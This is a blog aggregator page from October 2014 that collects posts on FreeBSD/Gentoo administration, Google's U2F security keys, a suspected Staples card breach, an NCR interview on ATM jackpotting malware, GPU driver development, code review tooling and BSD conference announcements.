Planet 2014-10-23 05:01 UTC


Contrary to all the examples I found, it’s not easy to get snmpwalk to communicate with snmpd. I am using the net-mgmt/net-snmp port with the default configuration options. It was installed with: pkg install net-mgmt/net-snmp This is the minimal configuration file, which should be placed at /usr/local/etc/snmp/snmpd.conf: rocommunity public When starting, you should see [something [...]


People who use Gmail and other Google services now have an extra layer of security available when logging into Google accounts. The company today incorporated into these services the open Universal 2nd Factor (U2F) standard, a physical USB-based second factor sign-in component that only works after verifying the login site is truly a Google site.

A $17 U2F device made by Yubico.
The U2F standard (PDF) is a product of the FIDO (Fast IDentity Online) Alliance, an industry consortium that’s been working to come up with specifications that support a range of more robust authentication technologies, including biometric identifiers and USB security tokens.

The approach announced by Google today essentially offers a more secure way of using the company’s 2-step authentication process. For several years, Google has offered an approach that it calls “2-step verification,” which sends a one-time pass code to the user’s mobile or land line phone.

2-step verification makes it so that even if thieves manage to steal your password, they still need access to your mobile or land line phone if they’re trying to log in with your credentials from a device that Google has not previously seen associated with your account. As Google notes in a support document, security key “offers better protection against this kind of attack, because it uses cryptography instead of verification codes and automatically works only with the website it’s supposed to work with.”

Unlike a one-time token approach, the security key does not rely on mobile phones (so no batteries needed), but the downside is that it doesn’t work for mobile-only users because it requires a USB port. Also, the security key doesn’t work for Google properties on anything other than Chrome.

The move comes a day after Apple launched its Apple Pay platform, a wireless payment system that takes advantage of the near-field communication (NFC) technology built into the new iPhone 6, which allows users to pay for stuff at participating merchants merely by tapping the phone on the store’s payment terminal.

I find it remarkable that Google, Apple and other major tech companies continue to offer more secure and robust authentication options than are currently available to consumers by their financial institutions. I, for one, will be glad to see Apple, Google or any other legitimate player give the entire mag-stripe based payment infrastructure a run for its money. They could hardly do worse.

Soon enough, government Web sites may also offer consumers more authentication options than many financial sites.  An Executive Order announced last Friday by The White House requires the National Security Council Staff, the Office of Science and Technology Policy and the Office of Management and Budget (OMB) to submit a plan to ensure that all agencies making personal data accessible to citizens through digital applications implement multiple layers of identity assurance, including multi-factor authentication. Verizon Enterprise has a good post with additional details of this announcement.


Hey guys check out our video on KDEConnect in PC-BSD on YouTube!  It’s an awesome new app that allows you to receive text messages, phone notifications, incoming calls notifications, media remote control, and more!



Multiple banks say they have identified a pattern of credit and debit card fraud suggesting that several Staples Inc. office supply locations in the Northeastern United States are currently dealing with a data breach. Staples says it is investigating “a potential issue” and has contacted law enforcement.

According to more than a half-dozen sources at banks operating on the East Coast, it appears likely that fraudsters have succeeded in stealing customer card data from some subset of Staples locations, including seven Staples stores in Pennsylvania, at least three in New York City, and another in New Jersey.

Framingham, Mass.-based Staples has more than 1,800 stores nationwide, but so far the banks contacted by this reporter have traced a pattern of fraudulent transactions on a group of cards that had all previously been used at a small number of Staples locations in the Northeast.

The fraudulent charges occurred at other (non-Staples) businesses, such as supermarkets and other big-box retailers. This suggests that the cash registers in at least some Staples locations may have fallen victim to card-stealing malware that lets thieves create counterfeit copies of cards that customers swipe at compromised payment terminals.

Asked about the banks’ claims, Staples’s Senior Public Relations Manager Mark Cautela confirmed that Staples is in the process of investigating a “potential issue involving credit card data and has contacted law enforcement.”

“We take the protection of customer information very seriously, and are working to resolve the situation,” Cautela said. “If Staples discovers an issue, it is important to note that customers are not responsible for any fraudulent activity on their credit cards that is reported on [in] a timely basis.”  


This author has long been fascinated with ATM skimmers, custom-made fraud devices designed to steal card data and PINs from unsuspecting users of compromised cash machines. But a recent spike in malicious software capable of infecting and jackpotting ATMs is shifting the focus away from innovative, high-tech skimming devices toward the rapidly aging ATM infrastructure in the United States and abroad.

Last month, media outlets in Malaysia reported that organized crime gangs had stolen the equivalent of about USD $1 million with the help of malware they’d installed on at least 18 ATMs across the country. Several stories about the Malaysian attack mention that the ATMs involved were all made by ATM giant NCR. To learn more about how these attacks are impacting banks and the ATM makers, I reached out to Owen Wild, NCR’s global marketing director, security compliance solutions.

Wild said ATM malware is here to stay and is on the rise.



BK: I have to say that if I’m a thief, injecting malware to jackpot an ATM is pretty money. What do you make of reports that these ATM malware thieves in Malaysia were all knocking over NCR machines?

OW: The trend toward these new forms of software-based attacks is occurring industry-wide. It’s occurring on ATMs from every manufacturer, multiple model lines, and is not something that is endemic to NCR systems. In this particular situation for the [Malaysian] customer that was impacted, it happened to be an attack on a Persona series of NCR ATMs. These are older models. We introduced a new product line for new orders seven years ago, so the newest Persona is seven years old.

BK: How many of your customers are still using this older model?

OW: Probably about half the install base is still on Personas.

BK: Wow. So, what are some of the common trends or weaknesses that fraudsters are exploiting that let them plant malware on these machines? I read somewhere that the crooks were able to insert CDs and USB sticks in the ATMs to upload the malware, and they were able to do this by peeling off the top of the ATMs or by drilling into the facade in front of the ATM. CD-ROM and USB drive bays seem like extraordinarily insecure features to have available on any customer-accessible portions of an ATM.

OW: What we’re finding is these types of attacks are occurring on standalone, unattended types of units where there is much easier access to the top of the box than you would normally find in the wall-mounted or attended models.

BK: Unattended….meaning they’re not inside of a bank or part of a structure, but stand-alone systems off by themselves.

OW: Correct.

BK: It seems like the other big factor with ATM-based malware is that so many of these cash machines are still running Windows XP, no?

This new malware, detected by Kaspersky Lab as Backdoor.MSIL.Tyupkin, affects ATMs from a major ATM manufacturer running Microsoft Windows 32-bit.
OW: Right now, that’s not a major factor. It is certainly something that has to be considered by ATM operators in making their migration move to newer systems. Microsoft discontinued updates and security patching on Windows XP, with very expensive exceptions. Where it becomes an issue for ATM operators is that maintaining Payment Card Industry (credit and debit card security standards) compliance requires that the ATM operator be running an operating system that receives ongoing security updates. So, while many ATM operators certainly have compliance issues, to this point we have not seen the operating system come into play.

BK: Really?

OW: Yes. If anything, the operating systems are being bypassed or manipulated with the software as a result of that.

BK: Wait a second. The media reports to date have observed that most of these ATM malware attacks were going after weaknesses in Windows XP?

OW: It goes deeper than that. Most of these attacks come down to two different ways of jackpotting the ATM. The first is what we call “black box” attacks, where some form of electronic device is hooked up to the ATM — basically bypassing the infrastructure in the processing of the ATM and sending an unauthorized cash dispense code to the ATM. That was the first wave of attacks we saw that started very slowly in 2012, went quiet for a while and then became active again in 2013.

The second type that we’re now seeing more of is attacks that start with the introduction of malware into the machine, and that kind of attack is a little less technical to get on the older machines if protective mechanisms aren’t in place.

BK: What sort of protective mechanisms, aside from physically securing the ATM?

OW: If you work on the configuration setting…for instance, if you lock down the BIOS of the ATM to eliminate its capability to boot from USB or CD drive, that gets you about as far as you can go. In high risk areas, these are the sorts of steps that can be taken to reduce risks.

BK: Seems like a challenge communicating this to your customers who aren’t anxious to spend a lot of money upgrading their ATM infrastructure.

OW: Most of these recommendations and requirements have to be considerate of the customer environment. We make sure we’ve given them the best guidance we can, but at end of the day our customers are going to decide how to approach this.

BK: You mentioned black-box attacks earlier. Is there one particular threat or weakness that makes this type of attack possible? One recent story on ATM malware suggested that the attackers may have been aided by the availability of ATM manuals online for certain older models.

OW: The ATM technology infrastructure is all designed on multivendor capability. You don’t have to be an ATM expert or have inside knowledge to generate or code malware for ATMs. Which is what makes the deployment of preventative measures so important. What we’re faced with as an industry is a combination of vulnerability on aging ATMs that were built and designed at a point where the threats and risk were not as great.



According to security firm F-Secure, the malware used in the Malaysian attacks was “PadPin,” a family of malicious software first identified by Symantec. Also, Russian antivirus firm Kaspersky has done some smashing research on a prevalent strain of ATM malware that it calls “Tyupkin.” Their write-up on it is here, and the video below shows the malware in action on a test ATM.

In a report published this month, the European ATM Security Team (EAST) said it tracked at least 20 incidents involving ATM jackpotting with malware in the first half of this year. “These were ‘cash out’ or ‘jackpotting’ attacks and all occurred on the same ATM type from a single ATM deployer in one country,” EAST Director Lachlan Gunn wrote. “While many ATM Malware attacks have been seen over the past few years in Russia, Ukraine and parts of Latin America, this is the first time that such attacks have been reported in Western Europe. This is a worrying new development for the industry in Europe”

Card skimming incidents fell by 21% compared to the same period in 2013, while overall ATM related fraud losses of €132 million (~USD $158 million) were reported, up 7 percent from the same time last year.



Here's a small piece of advice for all who want to upgrade their Perl to the very newest available, but still keep running an otherwise stable Gentoo installation: These three lines are exactly what needs to go into /etc/portage/package.keywords:
dev-lang/perl
virtual/perl-*
perl-core/*
Of course, as always, bugs may be present; what you get as Perl installation is called unstable or testing for a reason. We're looking forward to your reports on our bugzilla.


VC4 driver status update anholt's lj | 2014-10-19 20:05 UTC

I've just spent another week hanging out with my Broadcom and Raspberry Pi teammates, and it's unblocked a lot of my work.

Notably, I learned some unstated rules about how loading and storing from the tilebuffer work, which has significantly improved stability on the Pi (as opposed to simulation, which only asserted about following half of these rules).

I got an intro on the debug process for GPU hangs, which ultimately just looks like "run it through simpenrose (the simulator) directly. If that doesn't catch the problem, you capture a .CLIF file of all the buffers involved and feed it into RTL simulation, at which point you can confirm for yourself that yes, it's hanging, and then you hand it to somebody who understands the RTL and they tell you what the deal is." There's also the opportunity to use JTAG to look at the GPU's perspective of memory, which might be useful for some classes of problems. I've started on .CLIF generation (currently simulation-environment-only), but I've got some bugs in my generated files because I'm using packets that the .CLIF generator wasn't prepared for.

I got an overview of the cache hierarchy, which pointed out that I wasn't flushing the ARM dcache to get my writes got into system L2 (more like an L3) so that the GPU could see it. This should also improve stability, since before we were only getting lucky that the GPU would actually see our command stream.

Most importantly, I ended up fixing a mistake in my attempt at reset using the mailbox commands, and now I've got working reset. Testing cycles for GPU hangs have dropped from about 5 minutes to 2-30 seconds. Between working reset and improved stability from loads/stores, we're at the point that X is almost stable. I can now run piglit on actual hardware! (it takes hours, though)

On the X front, the modesetting driver is now merged to the X Server with glamor-based X rendering acceleration. It also happens to support DRI3 buffer passing, but not Present's pageflipping/vblank synchronization. I've submitted a patch series for DRI2 support with vblank synchronization (again, no pageflipping), which will get us more complete GLX extension support, including things like GLX_INTEL_swap_event that gnome-shell really wants.

In other news, I've been talking to a developer at Raspberry Pi who's building the KMS support. Combined with the discussions with keithp and ajax last week about compositing inside the X Server, I think we've got a pretty solid plan for what we want our display stack to look like, so that we can get GL swaps and video presentation into HVS planes, and avoid copies on our very bandwidth-limited hardware. Baby steps first, though -- he's still working on putting giant piles of clock management code into the kernel module so we can even turn on the GPU and displays on our own without using the firmware blob.

Testing status:
- 93.8% passrate on piglit on simulation
- 86.3% passrate on piglit gpu.py on Raspberry Pi

All those opcodes I mentioned in the previous post are now completed -- sadly, I didn't get people up to speed fast enough to contribute before those projects were the biggest things holding back the passrate. I've started a page at http://dri.freedesktop.org/wiki/VC4/ for documenting the setup process and status.

And now, next steps. Now that I've got GPU reset, a high priority is switching to interrupt-based render job tracking and putting an actual command queue in the kernel so we can have multiple GPU jobs queued up by userland at the same time (the VC4 sadly has no ringbuffer like other GPUs have). Then I need to clean up user <-> kernel ABI so that I can start pushing my linux code upstream, and probably work on building userspace BO caching.


I’ve been pretty busy lately, albeit behind the corners, which leads to a lower activity within the free software communities that I’m active in. Still, I’m not planning any exit, on the contrary. Lots of ideas are just waiting for some free time to engage. So what are the challenges that have been taking up my time?

One of them is that I recently moved. And with moving comes a lot of work in getting the place into a good shape and getting settled. Today I finished the last job that I wanted to finish in my appartment in a short amount of time, so that’s one thing off my TODO list.

Another one is that I started an intensive master-after-master programme with the subject of Enterprise Architecture. This not only takes up quite some ex-cathedra time, but also additional hours of studying (and for the moment also exams). But I’m really satisfied that I can take up this course, as I’ve been wandering around in the world of enterprise architecture for some time now and want to grow even further in this field.

But that’s not all. One of my side activities has been blooming a lot, and I recently reached the 200th server that I’m administering (although I think this number will reduce to about 120 as I’m helping one organization with handing over management of their 80+ systems to their own IT staff). Together with some friends (who also have non-profit customers’ IT infrastructure management as their side-business) we’re now looking at consolidating our approach to system administration (and engineering).

I’m also looking at investing time and resources in a start-up, depending on the business plan and required efforts. But more information on this later when things are more clear :-)


Fix ALL the BUGS! Luca Barbato | 2014-10-18 12:12 UTC

Vittorio started (with some help from me) to fix all the issues pointed by Coverity.

Static analysis

Coverity (and scan-build) are quite useful to spot mistakes even if their false-positive ratio tend to be quite high. Even the false-positives are usually interesting since the spot code unnecessarily convoluted. The code should be as simple as possible but not simpler.

The basic idea behind those tools is to try to follow the code-paths while compiling them and spot what could go wrong (e.g. you are feeding a NULL to a function that would deference it).

The problems with this approach are usually two: false positive due to the limited scope of the analyzer and false negatives due shadowing.

False Positives

Coverity might assume certain inputs are valid even if they are made impossible by some initial checks up in the codeflow.

In those case you should spend enough time to make sure Coverity is not right and those faulty inputs aren’t slipping somewhere. NEVER try to just add some checks to the code pointed as first move, you might either hide issues (e.g. if Coverity complains about uninitialized variable do not just initialize it to nothing, check why it happens and if the logic behind is wrong).

If Coverity is confused, your compiler is confused as well and will produce suboptimal executables. Properly fixing those issues can result in useful speedups. Simpler code is usually faster.

Ever increasing issue count

While fixing issues using those tools you might notice to your surprise that every time you fix something, something new appears out of thin air.

This is not magic but simply that the static analyzers usually keep some limit on how deep they go depending on the issues already present and how much time had been spent already.

That surprise had been fun since apparently some of the time limit is per compilation unit so splitting large files in smaller chunks gets us more results (while speeding up the building process thanks to better parallelism).

Usually fixing some high-impact issue gets us 3 or 5 new small impact issues.

I like solving puzzles so I do not mind having more fun, sadly I did not have much spare time to play this game lately.

Merge ALL the FIXES

Fixing properly all the issues is a lofty goal and as usual having a patch is just 1/2 of the work. Usually two set of eyes work better than one and an additional brain with different expertise can prevent a good chunk of mistakes. The review process is the other, sometimes neglected, half of solving issues.
So far about 100+ patches got piled up over the past weeks and now they are sent in small batches to ease the work of review. (I have something brewing to make reviewing simpler, as you might know)

During the review what probably about 1/10 of the patches will be rejected and the relative coverity report updated with enough information to explain why it is a false positive or the dangerous or strange behaviour pointed is intentional.

The next point release for our 4 maintained major releases: 0.8, 9, 10 and 11. Many thanks to the volunteers that spend their free time keeping all the branches up to date!


Tracking patches Luca Barbato | 2014-10-18 11:53 UTC

You need good tools to do a good job.

Even the best tool in the hand of a novice is a club.

I’m quite fond in improving the tools I use. And that’s why I started getting involved in Gentoo, Libav, VLC and plenty of other projects.

I already discussed about lldb and asan/valgrind, now my current focus is about patch trackers. In part it is due to the current effort to improve the libav one,

Contributors

Before talking about patches and their tracking I’d digress a little on who produces them. The mythical Contributor: without contributions an opensource project would not exist.

You might have recurring contributions and unique/seldom contributions. Both are quite important.
In general you should make so seldom contributors become recurring contributors.

A recurring contributor can accept to spend some additional time to setup the environment to actually provide its contribution back to the community, a sporadic contributor could be easily put off if the effort required to send his patch is larger than writing the patch itself.

Th project maintainers should make so the life of contributors is as simple as possible.

Patches and Revision Control

Lately most opensource projects saw the light and started to use decentralized source revision control system and thanks to github and many other is the concept of issue pull requests is getting part of our culture and with it comes hopefully a wider acceptance to the fact that the code should be reviewed before it is merged.

Pull Request

In a decentralized development scenario new code is usually developed in topic branches, routinely rebased against the master until the set is ready and then the set of changes (called series or patchset) is reviewed and after some round of fixes eventually merged. Thanks to bitbucket now we have forking, spooning and knifing as part of the jargon.

The review (and merge) step, quite properly, is called knifing (or stabbing): you have to dice, slice and polish the code before merging it.

Reviewing code

During a review bugs are usually spotted as well way to improve are suggested. Patches might be split or merged together and the series reworked and improved a lot.

The process is usually time consuming, even more for an organization made of volunteer: writing code is fun, address issues spotted is not so much, review someone else code is much less even.

Sadly it is a necessary annoyance since otherwise the errors (and horrors) that would slip through would be much bigger and probably much more. If you do not care about code quality and what you are writing is not used by other people you can probably ignore that, if you feel somehow concerned that what you wrote might turn some people life in a sea of pain. (On the other hand some gratitude for such daunting effort is usually welcome).

Pull request management

The old fashioned way to issue a pull request is either poke somebody telling that your branch is ready for merge or just make a set of patches and mail them to whoever is in charge of integrating code to the main branch.

git provides a nifty tool to do that called git send-email and is quite common to send sets of patches (called usually series) to a mailing list. You get feedback by email and you can update the set using the --in-reply-to option and the message id.

Platforms such as github and similar are more web centric and require you to use the web interface to issue and review the request. No additional tools are required beside your git and a browser.

gerrit and reviewboard provide custom scripts to setup ephemeral branches in some staging area then the review process requires a browser again. Every commit gets some tool-specific metadata to ease tracking changes across series revisions. This approach the more setup intensive.

Pro and cons

Mailing list approach

Testing patches from the mailing list is quite simple thanks to git am. And if the reply-to field is used properly updates appear sorted in a good way.

This method is the simplest for the people used to have the email client always open and a console (if they are using a well configured emacs or vim they literally do not move away from the editor).

On the other hand, people using a webmail or using a basic email client might find the approach more cumbersome than a web based one.

If your only method to track contribution is just a mailing list, gets quite easy to forget which is the status of a set. Patches could be neglected and even who wrote them might forget for a long time.

Patchwork approach

Patchwork tracks which patches hit a mailing list and tries to figure out if they are eventually merged automatically.

It is quite basic: it provides an web interface to check the status and provides a mean to just update the patch status. The review must happen in the mailing list and there is no concept of series.

As basic as it is works as a reminder about pending patches but tends to get cluttered easily and keeping it clean requires some effort.

Github approach

The web interface makes much easier spot what is pending and what’s its status, people used to have everything in the browser (chrome and mozilla could be made to work as a decent IDE lately) might like it much better.

Reviewing small series or single patches is usually nicer but the current UIs do not scale for larger (5+) patchsets.

People not living in a browser find quite annoying switch context and it requires additional effort to contribute since you have to register to a website and the process of issuing a patch requires many additional steps while in the email approach just require to type git send-email -1.

Gerrit approach

The gerrit interfaces tend to be richer than the Github counterparts. That can be good or bad since they aren’t as immediate and tend to overwhelm new contributors.

You need to make an additional effort to setup your environment since you need some custom script.

The series are tracked with additional precision, but for all the practical usage is the same as github with the additional bourden for the contributor.

Introducing plaid

Plaid is my attempt to tackle the problem. It is currently unfinished and in dire need of more hands working on it.

It’s basic concept is to be non-intrusive as much as possible, retaining all the pros of the simple git+email workflow like patchwork does.

It provides already additional features such as the ability to manage series of patches and to track updates to it. It sports a view to get a break out of which series require a review and which are pending for a long time waiting for an update.

What’s pending is adding the ability to review it directly in the browser, send the review email for the web to the mailing list and a some more.

Probably I might complete it within the year or next spring, if you like Flask or python contributions are warmly welcome!


Zugegeben: ich liebe Flame Wars. Insbesondere dann, wenn es um das richtige™ Betriebssystem geht. In der Vergangenheit war ich ebenfalls nicht um kontroverse Beiträge zu solchen Flames verlegen — und seien wir mal ehrlich, wen hätte es nicht schon in den Fingern gejuckt? Wenn ich mir jedoch erlaube, einen Blick auf die heutige Realität in Sachen Betriebssysteme zu werfen, so muss ich ernüchtert feststellen, dass mir die Berechtigung zum Flamen zumindest teilweise abhanden gekommen ist.

Allein in meinem Arbeitszimmer teilen sich friedlich fünf Betriebssysteme vier verschiedene Geräte — die Workstation brummelt wahlweise unter Arch Linux vor sich hin, bootet bei Bedarf aber auch ein Windows 7 (hauptsächlich für die virtuelle Fliegerei), das MacBook arbeitet — Überraschung! — mit OS X, die Sun Blade mit Solaris und das Handy mit Android. Zählt man die körperlich ausgelagerten Maschinen mit hinzu, gesellen sich noch zwei FreeBSD-Installationen (jeweils auf Servern für Web, Mail und was einem sonst noch so in den Sinn kommen könnte) und ein Linux auf dem Home Server hinzu.

Kommerziell vs. Open Source

Für viele (mich in einem früheren Leben eingeschlossen) ist das eine moralisch-religiöse Frage und somit keine, die eine pragmatische Antwort erlaubt. Mittlerweile bin ich jedoch davon überzeugt, dass einer der Hauptfaktoren für die Beurteilung dieser Frage in den eigenen finanziellen Möglichkeiten steckt. Wer kein Geld für Software ausgeben möchte oder kann, wird in kostenpflichtigen Angeboten schon deshalb das ultimative Böse wittern, weil ihm selbst der Zugang (zumindest auf legalem Wege) zu selbigen verwehrt bleibt.

Sicher, wenn ich für ein Problem im FOSS-Bereich eine gute, passende Lösung entdecke, dann werde ich sie nutzen. Genauso wenig verzichte ich aber auf die Nutzung kommerzieller Software, wenn diese einen bestimmten Zweck eben besser erfüllt. Im übrigen ist es mir sogar lieber, wenn die von mir zu erbringende Leistung (z. B. eine Lizenzzahlung) klar erkennbar ist — Geschäftsmodelle, bei denen mir eine Leistung vermeintlich kostenlos angeboten wird, sind mir da schon eher suspekt. Das trifft natürlich nicht auf echte FOSS Produkte zu, wohl aber auf (vermeintlich) kostenlos nutzbare Dienste.

Und nicht zuletzt in gewisser Weise auch auf die kostenfreie Verteilung von Betriebssystemen, wie etwa Android oder OS X. Oder wie sollte man etwa Ubuntu Linux in diesem Kontext bewerten? Die Software selbst ist Open Source, aber anders als z. B. bei FreeBSD steht hinter Ubuntu keine gemeinnützige Stiftung, sondern mit Canonical ein Unternehmen, das in letzter Konsequenz Geld verdienen muss. Klar, auf Red Hat trifft das ebenfalls zu, nur ist hier das Geschäftsmodell transparent und klar erkennbar.

Technikgläubigkeit

Viele Argumente sprechen für oder gegen ein bestimmtes Betriebssystem — so glaubte auch ich, Linux sei Windows per se überlegen, und das nicht nur aus moralischen Gründen. Mit der Zeit lernt man, dass es zwar sehr wohl einen „Coolness-Faktor“ gibt — je nerdiger das System, desto besser. Dieser ist gleichwohl nicht zwangsweise proportional zur Eignung eines Betriebssystems für einen bestimmten Anwendungszweck.

Für viele Aufgaben im Arbeitsalltag nutze ich heute Arch Linux. Völlig unnerdig mit KDE, und nicht etwa mit einem der viel nerdigeren Tiling Window Manager. Der Grund ist einfach: Gewöhnung. Ich habe mich an die Stärken und Schwächen dieses Systems gewöhnt. Insbesondere letzteres wird oft verkannt: Die Fähigkeit, um die Schwächen eines Systems herumarbeiten zu können, muss man sich durch lange Nutzung und Erfahrung aneignen. Und seien wir ehrlich: jedes System hat Schwächen, genauso aber auch Stärken.

Das persönlich erworbene Wissen zum Umgang mit Schwächen und Stärken ist aus meiner Sicht ein weiterer starker Motivator in Flame Wars zum Thema Betriebssysteme. Offen sein für andere Systeme bedeutet nämlich schlicht, den eigenen Expertenstatus zur Disposition zu stellen — und wenn auch nur sich selbst gegenüber. Umgekehrt wird ebenfalls ein Schuh draus: Je breiter das eigene Wissen über viele Systeme gestreut ist, desto ausgeglichener und sachlicher wird die eigene Position — und taugt letztlich nicht mehr für Flame Wars…

Weichgespült?

Bedeutet das jetzt, dass ich nicht mehr über bestimmte Systeme oder Distributionen herziehen darf? Mitnichten ist das der Fall, nur die Argumente müssen andere sein, um noch glaubhaft zu erscheinen. Die Kritik fällt so denn auch weniger pauschal aus. Meine persönliche Liste an Dingen, die mir nicht gefallen, ist fast beliebig lang und hoppelt quer durch die Welt der Betriebssysteme. Logischerweise stehen jedoch ganz oben auf der Liste Themen, die mit dem von mir am häufigsten genutzten System in Zusammenhang stehen. Hier mal die Top 3:

  • Ich mag systemd nicht. Mehrwehrt gegenüber OpenRC oder normalen Init-Skripten: für mich als Endanwender Fehlanzeige, dafür aber reihenweise Probleme und unvorhergesehenes Fehlverhalten, plus höhere Komplexität in der Administration.
  • Selbiges gilt für PulseAudio, einem weiteren Poetterismus.
  • Ein alter Hut dagegen ist die kranke Code-Qualität der Glibc — für Leute, die portablen C Code schreiben müssen und hofften, sich auf den POSIX-Standard verlassen zu können, ein einziger Albtraum.
Obwohl diese Kritik in vollem Umfang Arch Linux mit KDE trifft, setze ich es weiterhin ein — in dem Moment, wo ein anderes OS den Platz von Arch Linux einnehmen würde, bestünden gute Chancen, dass sie die Reihenfolge meiner persönlichen Hass-Liste ändert.

Fazit

Häufig werden in Flame Wars Argumente gebracht, warum ein bestimmtes OS für einen bestimmten Zweck nicht geeignet ist — typischerweise dann auch in wenig sachlicher Form („Selbst schuld, du Opfer, wenn Du … einsetzt.“). In einer solchen Diskussion zu hinterfragen, warum denn System xy für einen bestimmten Zweck so gut geeignet sei, ist nicht nur hilfreich, um die Diskussion zu versachlichen, sondern kann auch noch diebischen Spaß machen. Vor allem, wenn man sich dabei die vermutlich zugrunde liegende Motivationslage der Diskussionsteilnehmer vor Augen hält…


Sublime Lebt My Universe | 2014-10-18 09:23 UTC

Totgesagte leben länger — so oder so ähnlich haben sich das wohl die Macher von Sublime gedacht. Kurz nachdem schon überall im Internet die Schwanengesänge zu hören waren, wurde mit Nummer 3065 ein neuer Build veröffentlicht. Gut, auch das ist nun schon wieder fast zwei Monate her, aber immerhin ein Lebenszeichen.

Interessant an dem neuen Build: Es wurden nicht nur Bugs behoben und die Python API (minimal) aktualisiert — nein, denn u. a. mit Sidebar Icons sind auch neue Features in den Build mit eingeflossen. Nun gut, da mag so mancher argumentieren, dieses Feature sei von Atom geklaut — leugnen will ich das nicht; ein entsprechendes Plugin existiert für Atom schon länger.

A propos Atom: Obwohl mit selbigem eine gute Open Source Alternative zu Sublime existiert, ist letzteres für mich noch lange nicht aus dem Rennen. Der Grund ist geradezu banal: Atom zielt klar auf OS X Nutzer ab; nebenher ist es unter Arch Linux dank AUR auch noch einigermaßen wartbar. Windows-User hingegen werden systematisch vernachlässigt.

Sublime hingegen bietet auch für letztere fertig gebaute Binaries an — sogar in einer portablen Version, was es für mich besonders attraktiv macht. Schließlich habe ich auf Windows-Rechnern meines Brötchengebers keine Administratorrechte, was die Installation von Atom derzeit nahezu unmöglich macht.

Es bleibt also spannend: Wird Sublime 3 irgendwann fertig, oder schaffen es die Atom-Entwickler vorher, eine portable Windows-Version zur Verfügung zu stellen?


Hey everyone just a quick heads up we’ve just started a PC-BSD YouTube channel!  If you want to check it out you can follow this link https://www.youtube.com/channel/UCyd7MaPVUpa-ueUsGjUujag.  Don’t forget to subscribe for new videos and if you have a video or tutorial you’d like to submit send it my way!  We only have a couple videos right now so we need your help to grow our channel :).  Also we’d love for you to submit your ideas we can do for videos in the future.

Thanks!


My ideal editor Flameeyes's Weblog | 2014-10-17 19:03 UTC


Photo credit: Stephen Dann
Some of you probably read me ranting on G+ and Twitter about blog post editors. I have been complaining about that since at least last year when Typo decided to start eating my drafts. After that almost meltdown I decided to look for alternatives on writing blog posts, first with Evernote – until they decided to reset everybody's password and required you to type some content from one of your notes to be able to get the new one – and then with Google Docs.

I have indeed kept using Google Docs until recently, when it started having some issues with dead keys. Because I have been using US International layout for years, and I'm too used to it when I write English too. If I am to use a non-deadkeys keyboard, I end up adding spaces where they shouldn't be. So even if it solves it by just switching the layout, I wouldn't want to write a long text with it that way.

Then I decided to give another try to Evernote, especially as the Samsung Galaxy Note 10.1 I bought last year came with a yet-to-activate 12 months subscription to the Pro version. Not that I find anything extremely useful in it, but…

It all worked well for a while until they decided to throw me into the new Beta editor, which follows all the newest trends in blog editors. Yes because there are trends in editors now! Away goes the full-width editing, instead you have a limited-width editing space in a mostly-white canvas with disappearing interface, like node.js's Ghost and Medium and now Publify (the new name of what used to be Typo).

And here's my problem: while I understand that they try to make things that look neat and that supposedly are there to help you "focus on writing" they miss the point quite a bit with me. Indeed, rather than having a fancy editor, I think Typo needs a better drafting mechanism that does not puke on itself when you start playing with dates and other similar details.

And Evernote's new editor is not much better; indeed last week, while I was in Paris, I decided to take half an afternoon to write about libtool – mostly because J-B has been facing some issues and I wanted to document the root causes I encountered – and after two hours of heavy writing, I got to Evernote, and the note is gone. Indeed it asked me to log back in. And I logged in that same morning.

When I complained about that on Twitter, the amount of snark and backward thinking I got surprised me. I was expecting some trolling, but I had people seriously suggesting me that you should not edit things online. What? In 2014? You've got to be kidding me.

But just to make that clear, yes I have used offline editing for a while back, as Typo's editor has been overly sensible to changes too many times. But it does not scale. I'm not always on the same device, not only I have three computers in my own apartment, but I have two more at work, and then I have tablets. It is not uncommon for me to start writing on a post on one laptop, then switch to the other – for instance because I need access to the smartcard reader to read some data – or to start writing a blog post while at a conference with my work laptop, and then finish it in my room on the personal one, and so on so forth.

Yes I could use Dropbox for out-of-band synchronization, but its handling of conflicts is not great, if you end up having one of the devices offline by mistake — better than the effets of it on password syncs but not so much better. Indeed I have bad experiences with that, because it makes it too easy to start working on something completely offline, and then forget to resync it before editing it from a different service.

Other suggestions included (again) the use of statically generated blogs. I have said before that I don't care for them and I don't want to hear them as suggestions. First they suffer from the same problems stated above with working offline, and secondly they don't really support comments as first class citizens: they require services such as Disqus, Google+ or Facebook to store the comments, including it in the page as an external iframe. I not only don't like the idea of farming out the comments to a different service in general, but I would be losing too many features: search within the blog, fine-grained control over commenting (all my blog posts are open to comment, but it's filtered down with my ModSecurity rules), and I'm not even sure they would allow me to import the current set of comments.

I wonder why, instead of playing with all the CSS and JavaScript to make the interface disappear, the editors' developers don't invest time to make the drafts bulletproof. Client-side offline storage should allow for preserving data even in case of being logged out or losing network connection. I know it's not easy (or I would be writing it myself) but it shouldn't be impossible, either. Right now it seems the bling is what everybody wants to work on, rather than functionality — it probably is easier to put in your portfolio, and that could be a good explanation as any.


Several members of the PC-BSD and FreeBSD Projects will be at Ohio LinuxFest, to be held at the Greater Columbus Convention Center in Columbus, OH on October 24–26. Paid and free registration is available for this event.

Ken Moore will present “Lumina DE: A new desktop environment for PC-BSD” on Friday, October 11 at 11:00. Dru Lavigne will present “A Sneak Peak at FreeNAS 9.3″ on Friday, October 24 at 15:00. Dan Langille will present “Virtualization with FreeBSD Jails, ezjail, and ZFS” on Saturday, October 25 at 14:00.

There will be a FreeBSD booth in the expo area. Expo hours are 17:00–19:00 on Friday, October 24 and 8:00–17:00 on Saturday, October 25. As usual, we’ll have cool swag, PC-BSD DVDs, FreeNAS CDs, and will accept donations to the FreeBSD Foundation.

The BSDA certification exam will be available at 16:00 on Saturday, October 25 and at 10:00 on Sunday, October 26. The cost for the exam is $75.


There will be a FreeBSD booth in the expo area of All Things Open, to be held at the Raleigh Convention Center in Raleigh, NC on October 22–23. Registration is required for this event.

Expo hours are from 8:00–17:00 on Tuesday, October 21 and Wednesday, October 22. As usual, we’ll have some cool swag, PC-BSD DVDs, FreeNAS CDs, and brochures. We will also accept donations to the FreeBSD Foundation.


Short version: I used this regex when restoring to a jail on the slocum server: !/\.zfs/snapshot/snapshot-for-backup/!/! Background Today I did this when setting up an ssh-key on a new host: ssh-add -L > ~/.ssh/authorized_keys Oh. That should have been >>. Restoring During the Bacula restore, I need to change this path: /usr/jails/mydev/.zfs/snapshot/snapshot-for-backup/usr/home/dan/.ssh/ to /usr/jails/mydev/usr/home/dan/.ssh/ That [...]


